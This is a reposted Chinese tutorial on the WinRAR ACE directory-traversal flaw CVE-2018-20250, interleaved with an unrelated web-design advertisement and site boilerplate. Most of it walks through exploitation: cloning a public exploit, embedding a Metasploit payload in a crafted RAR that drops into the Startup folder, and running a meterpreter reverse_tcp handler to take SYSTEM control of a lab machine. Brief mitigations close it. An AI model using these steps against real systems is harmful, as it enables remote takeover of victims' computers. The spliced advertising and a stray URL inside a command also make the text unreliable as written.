該漏洞是由于WinRAR 所使用的一個(gè)陳舊的動(dòng)態(tài)鏈接庫(kù)UNACEV2.dll所造成的,該動(dòng)態(tài)鏈接庫(kù)在2006 年被編譯,沒(méi)有任何的基礎(chǔ)保護(hù)機(jī)制(ASLR,DEP 等)。該動(dòng)態(tài)鏈接庫(kù)的作用是處理ACE 格式文件。而在解壓處理過(guò)程中存在一處目錄穿越漏洞,允許解壓過(guò)程寫入文件至開機(jī)啟動(dòng)項(xiàng),導(dǎo)致代碼執(zhí)行
建網(wǎng)站原本是網(wǎng)站策劃師、網(wǎng)絡(luò)程序員、網(wǎng)頁(yè)設(shè)計(jì)師等,應(yīng)用各種網(wǎng)絡(luò)程序開發(fā)技術(shù)和網(wǎng)頁(yè)設(shè)計(jì)技術(shù)配合操作的協(xié)同工作。成都創(chuàng)新互聯(lián)專業(yè)提供成都網(wǎng)站建設(shè)、做網(wǎng)站,網(wǎng)頁(yè)設(shè)計(jì),網(wǎng)站制作(企業(yè)站、響應(yīng)式網(wǎng)站設(shè)計(jì)、電商門戶網(wǎng)站)等服務(wù),從網(wǎng)站深度策劃、搜索引擎友好度優(yōu)化到用戶體驗(yàn)的提升,我們力求做到極致!
漏洞編號(hào): CVE-2018-20250
影響版本:
WinRAR < 5.70 Beta 1
Bandizip < = 6.2.0.0
好壓(2345壓縮) < = 5.9.8.10907
360壓縮 < = 4.0.0.1170
exp下載:
1.使用Metasploit生成Payload
2.使用exp生成惡意程序
cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py
將exp.py中的evil_filename = “calc.exe”改為”WinRAR.exe”
將CVE-2018-20250文件夾復(fù)制到Windows10中執(zhí)行
3.在靶機(jī)上運(yùn)行惡意程序
將test.rar 投放到win8上 解壓運(yùn)行
4.在kali上監(jiān)聽metasploit
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com
5.控制靶機(jī)
Win8重啟之后 kali會(huì)接受到會(huì)話 此時(shí)執(zhí)行shell
進(jìn)入到win8系統(tǒng)的system權(quán)限
1. 刪除受影響壓縮軟件目錄下UNACEV2.dll文件能有效防御
2. 升級(jí)到最新版本,WinRAR 目前版本是 5.70 Beta 1
3. 總而言之,該漏洞并沒(méi)有那么致命。目標(biāo)性的打站,得先欺騙下載,并再在未防護(hù)的服務(wù)器上解壓,企業(yè)服務(wù)器管理員都很難會(huì)這樣做。而且必須得服務(wù)器重啟才能生效,不能直接執(zhí)行腳本
分享題目:WinRAR目錄穿越漏洞
文章來(lái)源:http://aaarwkj.com/article46/peishg.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供靜態(tài)網(wǎng)站、品牌網(wǎng)站設(shè)計(jì)、動(dòng)態(tài)網(wǎng)站、網(wǎng)站改版、、品牌網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)